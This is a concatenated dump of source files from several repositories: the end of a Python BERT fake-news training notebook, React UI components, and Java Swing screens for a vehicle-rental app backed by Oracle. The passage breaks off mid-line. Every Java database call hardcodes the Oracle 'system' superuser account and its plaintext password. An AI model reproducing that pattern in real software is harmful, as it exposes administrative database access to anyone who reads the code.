== 1 : tmp_tp = tmp_tp + 1 elif pred_choice[i] == 0 and target[i] == 0 : tmp_tn = tmp_tn + 1 elif pred_choice[i] == 0 and target[i] == 1 : tmp_fn = tmp_fn + 1 elif pred_choice[i] == 1 and target[i] == 0 : tmp_fp = tmp_fp + 1 # TP both predict and label are 1 TP += tmp_tp # TN both predict and label are 0 TN += tmp_tn # FN predict 0 label 1 FN += tmp_fn # FP predict 1 label 0 FP += tmp_fp epoch_loss = running_loss / dataset_sizes[phase] p = TP / (TP + FP) r = TP / (TP + FN) F1 = 2 * r * p / (r + p) acc = (TP + TN) / (TP + TN + FP + FN) ### draw ROC curce tpr = TP/(TP+FN) fpr = FP/(FP+TN) tnr = TN/(FP+TN) total_scores = np.array(total_scores) total_tar = np.array(total_tar) fpr, tpr, thresholds = roc_curve(total_tar, total_scores) roc_auc = auc(fpr, tpr) plt.title('ROC') if roc_auc > best_auc: best_auc = roc_auc if epoch < num_epochs -1: plt.plot(fpr, tpr,'b',label='AUC = %0.4f'% roc_auc) if epoch == num_epochs -1: plt.plot(fpr, tpr, color='darkorange', label='MAX AUC = %0.4f'% best_auc) plt.legend(loc='lower right') plt.plot([0,1],[0,1],'r--') plt.ylabel('TPR') plt.xlabel('FPR') plt.show() #print('{} p: {:.4f} '.format(phase,p )) #print('{} r: {:.4f} '.format(phase,r )) print('{} F1: {:.4f} '.format(phase,F1 )) print('{} accuracy: {:.4f} '.format(phase,acc )) if phase == 'val' and epoch_loss < best_loss: print('saving with loss of {}'.format(epoch_loss), 'improved over previous {}'.format(best_loss)) best_loss = epoch_loss best_model_wts = copy.deepcopy(model.state_dict()) #torch.save(model.state_dict(), '/content/drive/My Drive/Colab Notebooks/bert_model_test_loss.pth') if F1 > best_f1: best_f1 = F1 if phase == 'val' and acc > best_acc_test: best_acc_test = acc if phase == 'train' and acc > best_acc_train: best_acc_train = acc #best_model_wts = copy.deepcopy(model.state_dict()) #torch.save(model.state_dict(), '/content/drive/My Drive/Colab Notebooks/bert_model_test_f1.pth') print() time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format( time_elapsed // 60, time_elapsed % 60)) print("Parament setting: ") print("cased: ",par_cased) print("cleanup: ",par_cleanup) print("eda: ",par_eda) print('Best train Acc: {:4f}'.format(float(best_acc_train))) print('Best test Acc: {:4f}'.format(float(best_acc_test))) print('Best f1 score: {:4f}'.format(float(best_f1))) # load best model weights model.load_state_dict(best_model_wts) return model ``` ## 4. Final output ### 4.1 Model details ```Python print(model) model.to(device) ``` ### 4.2 F1 and other details ```Python model_ft1 = train_model(model, criterion, optimizer_ft, exp_lr_scheduler,num_epochs=10) ```
7c0ef61945299344f4f27f65565ef213e7fa83ce
[ "Markdown", "Python" ]
2
Python
NavePnow/Google-BERT-on-fake_or_real-news-dataset
0968fc170253e9bb1f3db4d6266aaca5e829c988
bc692d2f63d14ac263fff2b4b29463d1273271d6
refs/heads/master
<file_sep>import React from 'react'; import styled from 'styled-components'; import Text from './Text'; const Button = styled.div` padding: 5px; border: 1px solid white; border-radius: 4px; font-weight: 200; font-family: OpenSans; cursor: pointer; color: white; &:hover { background-color: white; color: ${props => props.theme.almostblack}; } ` export default Button;<file_sep>import React, { Component } from 'react'; import styled from 'styled-components'; import { connect } from 'react-redux'; import { withRouter } from 'react-router-dom'; import { loadAll, createCharacter } from '../reducers/characters'; import { startCharacterCreation, changeCharacterCreationStage } from '../reducers/ui'; import Container from '../atoms/Container'; import CharacterCreation from '../components/CharacterCreation'; import Character from '../components/Character'; const AddCharacter = styled.div` position: absolute; bottom: 15px; right: 15px; background-color: ${props => props.theme.green}; border-radius: 3px; outline: none; border: none; color: ${props => props.theme.text}; padding: 15px 32px; text-align: center; text-decoration: none; font-size: 16px; box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); &:active { box-shadow: none; } ` class Characters extends Component { componentWillMount() { if (!this.props.loaded) this.props.loadAll() } render() { const { characters, createCharacter, creatingCharacter, creationStage, startCharacterCreation, changeCharacterCreationStage } = this.props; console.log(creatingCharacter) if (creatingCharacter) { return ( <CharacterCreation stage={creationStage} changeStage={changeCharacterCreationStage} /> ) } return ( <Container width='100%' height='100%'> { (characters.length === 0) ? null : characters.map(character => { const { name, job, lvl } = character return <Character key={character._id} name={name} job={job} lvl={lvl} character={character} id={character._id} /> }) } <AddCharacter onClick={createCharacter}>Add Character</AddCharacter> </Container> ) } } const mapStateToProps = (state) => { return { characters: state.characters.characters, loaded: state.characters.loaded, creatingCharacter: state.ui.creatingCharacter, creationStage: state.ui.creationStage } } export default withRouter(connect(mapStateToProps, { loadAll, createCharacter, startCharacterCreation, changeCharacterCreationStage })(Characters));<file_sep>import React from 'react'; import styled from 'styled-components'; import LI from '../atoms/ListItem'; import Container from '../atoms/Container'; import Text from '../atoms/Text'; const ListItem = styled(LI)` cursor: pointer; border-radius: 4px; &:hover { background-color: ${props => props.theme.dark}; } ` const Description = styled(Text)` overflow: hidden; text-overflow: ellipsis; ` const Item = ({ item }) => { return ( <ListItem key={item.id} direction='row' padding='5px' width='calc(100% - 10px)' justifyContent='space-between' alignItems='center' hover> <Container maxWidth='50%' flowY='hidden' flowWrap> <Text>{item.name}</Text> <Description size='0.8em'>{item.type}</Description> </Container> <Container direction='row'> <Text margin='0 6px'>55 lb</Text> <Text margin='0 6px'>75 gp</Text> </Container> </ListItem> ) } export default Item;
66a07d8afb3063c2e8e2ca2f7ba1b2ad1e652405
[ "JavaScript" ]
3
JavaScript
lorddusk/BardsBallad
1cd831770c27f48397b3518fbc69f552e7c46d7e
891d497df24b4def0cfc995f61ca51df42074613
refs/heads/master
<repo_name>LuisEduardoER/locadoradeveiculospucc<file_sep>/src/net/danielpaz/pucc/poo/trabalho/view/ExibirModelo.java package net.danielpaz.pucc.poo.trabalho.view; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.SQLException; import java.util.Vector; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JOptionPane; import javax.swing.table.DefaultTableModel; import javax.swing.table.TableModel; import net.danielpaz.pucc.poo.trabalho.conexao.*; import net.danielpaz.pucc.poo.trabalho.model.*; import javax.swing.GroupLayout.Alignment; import javax.swing.GroupLayout; import javax.swing.LayoutStyle.ComponentPlacement; public class ExibirModelo extends javax.swing.JPanel { public ExibirModelo() { initComponents(); } private void initComponents() { jPanel2 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jScrollPane1 = new javax.swing.JScrollPane(); tableModelo = new javax.swing.JTable(); bBuscarTodos = new javax.swing.JButton(); bDeletar = new javax.swing.JButton(); setBackground(new java.awt.Color(255, 255, 255)); jPanel2.setBackground(new java.awt.Color(255, 255, 255)); jLabel1.setFont(new java.awt.Font("Arial", 1, 18)); // NOI18N jLabel1.setText("Exibir Modelo"); tableModelo.setModel(new javax.swing.table.DefaultTableModel( new Object [][] { {null, null, null} }, new String [] { "Codigo", "Marca", "Descrição" } )); jScrollPane1.setViewportView(tableModelo); bBuscarTodos.setBackground(new java.awt.Color(255, 255, 255)); bBuscarTodos.setText("BUCAR TODOS"); bBuscarTodos.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarTodosActionPerformed(evt); } }); bDeletar.setBackground(new java.awt.Color(255, 255, 255)); bDeletar.setText("DELETAR"); bDeletar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bDeletarActionPerformed(evt); } }); javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2); jPanel2Layout.setHorizontalGroup( jPanel2Layout.createParallelGroup(Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(75) .addGroup(jPanel2Layout.createParallelGroup(Alignment.LEADING) .addComponent(jLabel1) .addComponent(jScrollPane1, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(48) .addComponent(bBuscarTodos) .addGap(153) .addComponent(bDeletar))) .addContainerGap(94, Short.MAX_VALUE)) ); jPanel2Layout.setVerticalGroup( jPanel2Layout.createParallelGroup(Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(24) .addComponent(jLabel1) .addGap(96) .addGroup(jPanel2Layout.createParallelGroup(Alignment.BASELINE) .addComponent(bDeletar) .addComponent(bBuscarTodos)) .addGap(46) .addComponent(jScrollPane1, GroupLayout.PREFERRED_SIZE, 287, GroupLayout.PREFERRED_SIZE) .addGap(0, 140, Short.MAX_VALUE)) ); jPanel2.setLayout(jPanel2Layout); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this); this.setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addGap(91, 91, 91) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap()) ); } private void bBuscarTodosActionPerformed(java.awt.event.ActionEvent evt) { try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); ModeloDAO modeloDAO = new ModeloDAO (bd); ResultSet resultado = modeloDAO.getModelo(); TableModel tblModel = buildTableModel(resultado); tableModelo.setModel(tblModel); } catch (Exception e) { Logger.getLogger(ExibirModelo.class.getName()).log(Level.SEVERE, null, e); } } private void bDeletarActionPerformed(java.awt.event.ActionEvent evt) { if(tableModelo.getSelectedRowCount() > 0){ try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); ModeloDAO modeloDAO = new ModeloDAO (bd); for (int i : tableModelo.getSelectedRows()) { Object modeloDeletar = tableModelo.getValueAt(i, 0); String modeloDesc = (String) tableModelo.getValueAt(i, 1); int resposta; resposta = JOptionPane.showConfirmDialog(null, "Deseja deletar o Modelo " +modeloDesc + "?"); if (resposta == JOptionPane.YES_OPTION) { modeloDAO.excluir(modeloDeletar); } else { return; } } bd.fecharConexao(); if (bd.sucessoBanco(true)) { JOptionPane.showMessageDialog(null, "Registros deletados com sucesso !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } else { JOptionPane.showMessageDialog(null, "Erro de conexão ao banco", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } } catch (Exception e) { Logger.getLogger(ExibirModelo.class.getName()).log(Level.SEVERE, null, e); } } } public static DefaultTableModel buildTableModel(ResultSet rs) throws SQLException { ResultSetMetaData metaData = rs.getMetaData(); // names of columns Vector<String> columnNames = new Vector<String>(); int columnCount = metaData.getColumnCount(); for (int column = 1; column <= columnCount; column++) { columnNames.add(metaData.getColumnName(column)); } // data of the table Vector<Vector<Object>> data = new Vector<Vector<Object>>(); while (rs.next()) { Vector<Object> vector = new Vector<Object>(); for (int columnIndex = 1; columnIndex <= columnCount; columnIndex++) { vector.add(rs.getObject(columnIndex)); } data.add(vector); } return new DefaultTableModel(data, columnNames); } private javax.swing.JButton bBuscarTodos; private javax.swing.JButton bDeletar; private javax.swing.JLabel jLabel1; private javax.swing.JPanel jPanel2; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTable tableModelo; } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/control/Modelo.java package net.danielpaz.pucc.poo.trabalho.control; public class Modelo extends Marca { protected int idModelo; protected String descricaoModelo; public void setIdModelo (int idModelo) throws Exception { if (idModelo <= 0) throw new Exception ("Codigo invalido"); this.idModelo = idModelo; } public void setDescricaoModelo (String descricaoModelo) throws Exception { if (descricaoModelo==null || descricaoModelo.equals("")) throw new Exception ("Descricao nao fornecida"); this.descricaoModelo = descricaoModelo; } public int getIdModelo () { return this.idModelo; } public String getDescricaoModelo () { return this.descricaoModelo; } public Modelo (int idMarca, int idModelo, String descricaoModelo) throws Exception { super(idMarca); this.setIdModelo(idModelo); this.setDescricaoModelo (descricaoModelo); } public Modelo (int idMarca,String descricaoModelo) throws Exception { super(idMarca); this.setDescricaoModelo (descricaoModelo); } } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/view/ExibirTipoVeiculo.java package net.danielpaz.pucc.poo.trabalho.view; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.SQLException; import java.util.Vector; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JOptionPane; import javax.swing.table.DefaultTableModel; import javax.swing.table.TableModel; import net.danielpaz.pucc.poo.trabalho.conexao.*; import net.danielpaz.pucc.poo.trabalho.control.TipoVeiculo; import net.danielpaz.pucc.poo.trabalho.model.*; public class ExibirTipoVeiculo extends javax.swing.JPanel { public ExibirTipoVeiculo() { initComponents(); } private void initComponents() { jPanel2 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jLabel4 = new javax.swing.JLabel(); tdCodigo = new javax.swing.JTextField(); bBuscar = new javax.swing.JButton(); jScrollPane1 = new javax.swing.JScrollPane(); tableModelo = new javax.swing.JTable(); bBuscarTodos = new javax.swing.JButton(); bDeletar = new javax.swing.JButton(); setBackground(new java.awt.Color(255, 255, 255)); jPanel2.setBackground(new java.awt.Color(255, 255, 255)); jLabel1.setFont(new java.awt.Font("Arial", 1, 18)); // NOI18N jLabel1.setText("Exibir Tipo de Veículo"); jLabel4.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N jLabel4.setText("Código"); tdCodigo.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { tdCodigoActionPerformed(evt); } }); bBuscar.setBackground(new java.awt.Color(255, 255, 255)); bBuscar.setText("BUSCAR"); bBuscar.setFocusable(false); bBuscar.setHorizontalTextPosition(javax.swing.SwingConstants.CENTER); bBuscar.setVerticalTextPosition(javax.swing.SwingConstants.BOTTOM); bBuscar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarActionPerformed(evt); } }); tableModelo.setModel(new javax.swing.table.DefaultTableModel( new Object [][] { {null, null, null} }, new String [] { "Codigo", "Preço (R$)", "Descrição" } )); jScrollPane1.setViewportView(tableModelo); bBuscarTodos.setBackground(new java.awt.Color(255, 255, 255)); bBuscarTodos.setText("BUCAR TODOS"); bBuscarTodos.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarTodosActionPerformed(evt); } }); bDeletar.setBackground(new java.awt.Color(255, 255, 255)); bDeletar.setText("DELETAR"); bDeletar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bDeletarActionPerformed(evt); } }); javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2); jPanel2.setLayout(jPanel2Layout); jPanel2Layout.setHorizontalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(75, 75, 75) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(jLabel1) .addContainerGap(426, Short.MAX_VALUE)) .addGroup(jPanel2Layout.createSequentialGroup() .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jLabel4) .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(bBuscar) .addGap(38, 38, 38) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(bBuscarTodos) .addGap(42, 42, 42) .addComponent(bDeletar)) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)))) .addGap(0, 0, Short.MAX_VALUE)))) ); jPanel2Layout.setVerticalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(24, 24, 24) .addComponent(jLabel1) .addGap(42, 42, 42) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel4) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) .addGap(34, 34, 34) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(bBuscar) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(bBuscarTodos) .addComponent(bDeletar))) .addGap(46, 46, 46) .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 287, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(0, 140, Short.MAX_VALUE)) ); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this); this.setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addGap(91, 91, 91) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap()) ); } private void bBuscarActionPerformed(java.awt.event.ActionEvent evt) { if(tdCodigo.getText().isEmpty()){ JOptionPane.showMessageDialog(null, "Por favor informe o código !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); TipoVeiculo tipoVeiculo = new TipoVeiculo (Integer.parseInt(tdCodigo.getText())); int auxTipoVeiculo = tipoVeiculo.getCodigo(); TipoVeiculoDAO tipoVeiculoDAO = new TipoVeiculoDAO (bd); TipoVeiculo tv = tipoVeiculoDAO.getTipoVeiculo(auxTipoVeiculo); tableModelo.getModel().setValueAt(tv.getCodigo(), 0, 0); tableModelo.getModel().setValueAt(tv.getPreco(), 0, 1); tableModelo.getModel().setValueAt(tv.getDescricao(), 0, 2); repaint(); } catch (Exception ex) { Logger.getLogger(ExibirTipoVeiculo.class.getName()).log(Level.SEVERE, null, ex); } } private void tdCodigoActionPerformed(java.awt.event.ActionEvent evt) { } private void bBuscarTodosActionPerformed(java.awt.event.ActionEvent evt) { try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); TipoVeiculoDAO tipoVeiculoDAO = new TipoVeiculoDAO (bd); ResultSet resultado = tipoVeiculoDAO.getTipoVeiculo(); TableModel tblModel = buildTableModel(resultado); tableModelo.setModel(tblModel); } catch (Exception e) { Logger.getLogger(ExibirTipoVeiculo.class.getName()).log(Level.SEVERE, null, e); } } private void bDeletarActionPerformed(java.awt.event.ActionEvent evt) { if(tableModelo.getSelectedRowCount() > 0){ try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); TipoVeiculoDAO tipoVeiculoDAO = new TipoVeiculoDAO (bd); for (int i : tableModelo.getSelectedRows()) { Object tpVeiculoDeletar = tableModelo.getValueAt(i, 0); String tpVeiculoDesc = (String) tableModelo.getValueAt(i, 2); int resposta; resposta = JOptionPane.showConfirmDialog(null, "Deseja deletar o Tipo de Veiculo " +tpVeiculoDesc + "?"); if (resposta == JOptionPane.YES_OPTION) { tipoVeiculoDAO.excluir(tpVeiculoDeletar); } else { return; } } bd.fecharConexao(); if (bd.sucessoBanco(true)) { JOptionPane.showMessageDialog(null, "Registros deletados com sucesso !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } else { JOptionPane.showMessageDialog(null, "Erro de conexão ao banco", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } } catch (Exception e) { Logger.getLogger(ExibirTipoVeiculo.class.getName()).log(Level.SEVERE, null, e); } } } public static DefaultTableModel buildTableModel(ResultSet rs) throws SQLException { ResultSetMetaData metaData = rs.getMetaData(); // names of columns Vector<String> columnNames = new Vector<String>(); int columnCount = metaData.getColumnCount(); for (int column = 1; column <= columnCount; column++) { columnNames.add(metaData.getColumnName(column)); } // data of the table Vector<Vector<Object>> data = new Vector<Vector<Object>>(); while (rs.next()) { Vector<Object> vector = new Vector<Object>(); for (int columnIndex = 1; columnIndex <= columnCount; columnIndex++) { vector.add(rs.getObject(columnIndex)); } data.add(vector); } return new DefaultTableModel(data, columnNames); } private javax.swing.JButton bBuscar; private javax.swing.JButton bBuscarTodos; private javax.swing.JButton bDeletar; private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel4; private javax.swing.JPanel jPanel2; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTable tableModelo; private javax.swing.JTextField tdCodigo; } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/view/ExibirMarca.java package net.danielpaz.pucc.poo.trabalho.view; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.SQLException; import java.util.ArrayList; import java.util.List; import java.util.Vector; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JOptionPane; import javax.swing.JTable; import javax.swing.table.DefaultTableModel; import javax.swing.table.TableModel; import net.danielpaz.pucc.poo.trabalho.conexao.*; import net.danielpaz.pucc.poo.trabalho.control.Marca; import net.danielpaz.pucc.poo.trabalho.model.*; public class ExibirMarca extends javax.swing.JPanel { /** * Creates new form ModeloLayout */ public ExibirMarca() { initComponents(); } private void initComponents() { jPanel2 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jLabel4 = new javax.swing.JLabel(); tdCodigo = new javax.swing.JTextField(); bBuscar = new javax.swing.JButton(); jScrollPane1 = new javax.swing.JScrollPane(); tableMarca = new javax.swing.JTable(); bBuscarTodos = new javax.swing.JButton(); bDeletar = new javax.swing.JButton(); setBackground(new java.awt.Color(255, 255, 255)); jPanel2.setBackground(new java.awt.Color(255, 255, 255)); jLabel1.setFont(new java.awt.Font("Arial", 1, 18)); // NOI18N jLabel1.setText("Exibir Marca"); jLabel4.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N jLabel4.setText("Código"); tdCodigo.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { tdCodigoActionPerformed(evt); } }); bBuscar.setBackground(new java.awt.Color(255, 255, 255)); bBuscar.setText("BUSCAR"); bBuscar.setFocusable(false); bBuscar.setHorizontalTextPosition(javax.swing.SwingConstants.CENTER); bBuscar.setVerticalTextPosition(javax.swing.SwingConstants.BOTTOM); bBuscar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarActionPerformed(evt); } }); tableMarca.setModel(new javax.swing.table.DefaultTableModel( new Object [][] { {null, null} }, new String [] { "Codigo", "Descrição" } )); jScrollPane1.setViewportView(tableMarca); bBuscarTodos.setBackground(new java.awt.Color(255, 255, 255)); bBuscarTodos.setText("BUCAR TODOS"); bBuscarTodos.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarTodosActionPerformed(evt); } }); bDeletar.setBackground(new java.awt.Color(255, 255, 255)); bDeletar.setText("DELETAR"); bDeletar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bDeletarActionPerformed(evt); } }); javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2); jPanel2.setLayout(jPanel2Layout); jPanel2Layout.setHorizontalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(75, 75, 75) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jLabel1) .addGroup(jPanel2Layout.createSequentialGroup() .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jLabel4) .addComponent(bBuscar)) .addGap(44, 44, 44) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(bBuscarTodos) .addGap(51, 51, 51) .addComponent(bDeletar)) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)))) .addContainerGap(196, Short.MAX_VALUE)) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(0, 0, Short.MAX_VALUE)))) ); jPanel2Layout.setVerticalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(24, 24, 24) .addComponent(jLabel1) .addGap(33, 33, 33) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel4) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) .addGap(38, 38, 38) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(bBuscar) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(bBuscarTodos) .addComponent(bDeletar))) .addGap(54, 54, 54) .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 318, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(0, 140, Short.MAX_VALUE)) ); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this); this.setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); } public static DefaultTableModel buildTableModel(ResultSet rs) throws SQLException { ResultSetMetaData metaData = rs.getMetaData(); // names of columns Vector<String> columnNames = new Vector<String>(); int columnCount = metaData.getColumnCount(); for (int column = 1; column <= columnCount; column++) { columnNames.add(metaData.getColumnName(column)); } // data of the table Vector<Vector<Object>> data = new Vector<Vector<Object>>(); while (rs.next()) { Vector<Object> vector = new Vector<Object>(); for (int columnIndex = 1; columnIndex <= columnCount; columnIndex++) { vector.add(rs.getObject(columnIndex)); } data.add(vector); } return new DefaultTableModel(data, columnNames); } private void bBuscarActionPerformed(java.awt.event.ActionEvent evt) { if(tdCodigo.getText().isEmpty()) { JOptionPane.showMessageDialog(null, "Por favor informe o código !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); Marca marca = new Marca (Integer.parseInt(tdCodigo.getText())); int auxMarca = marca.getIdMarca(); MarcaDAO marcaDAO = new MarcaDAO(bd); Marca m = marcaDAO.getMarca(auxMarca); tableMarca.getModel().setValueAt(m.getIdMarca(), 0, 0); tableMarca.getModel().setValueAt(m.getDescricaoMarca(), 0, 1); } catch (Exception ex) { Logger.getLogger(ExibirMarca.class.getName()).log(Level.SEVERE, null, ex); } } private void tdCodigoActionPerformed(java.awt.event.ActionEvent evt) { } private void bBuscarTodosActionPerformed(java.awt.event.ActionEvent evt) { try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); MarcaDAO 